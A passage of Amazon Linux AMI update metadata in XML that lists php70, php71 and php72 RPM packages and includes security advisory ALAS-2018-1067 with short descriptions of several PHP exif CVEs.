arch="x86_64"><filename>Packages/php70-opcache-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.31" release="1.30.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-intl-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.31" 
release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.31" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.31-1.30.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-odbc" 
version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.31" 
release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.31" 
release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.31" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.31-1.30.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package 
name="php71-odbc" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.20" release="1.33.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php71-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package 
name="php71-xmlrpc" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.20" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.20-1.33.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.20" release="1.33.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-tidy-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.20" release="1.33.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-process-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.20" release="1.33.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-debuginfo-7.1.20-1.33.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.20" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.20-1.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1067</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1067: medium priority package update for php72</title><issued date="2018-08-22 19:31:00" /><updated date="2018-08-23 17:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14883:
An issue was discovered in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8. An integer overflow leads to a heap-based buffer over-read in exif_thumbnail_extract of exif.c.
1609637:
CVE-2018-14883 php: exif: integer overflow leading to out-of-bound buffer read in exif_thumbnail_extract()
CVE-2018-14851:
exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted JPEG file.
1609642:
CVE-2018-14851 php: exif: buffer over-read in exif_process_IFD_in_MAKERNOTE()
CVE-2018-12882:
exif_read_from_impl in ext/exif/exif.c in PHP 7.2.x through 7.2.7 allows attackers to trigger a use-after-free (in exif_read_from_file) because it closes a stream that it is not responsible for closing. The vulnerable code is reachable through the PHP exif_read_data function.
1595502:
CVE-2018-12882 php: Use-after-free reachable via the exif.c:exif_read_from_impl() function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12882" title="" id="CVE-2018-12882" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14851" title="" id="CVE-2018-14851" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14883" title="" id="CVE-2018-14883" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-pspell" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-intl" 
version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.8" 
release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.8-1.5.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.8" 
release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.8" release="1.5.amzn1" epoch="0" 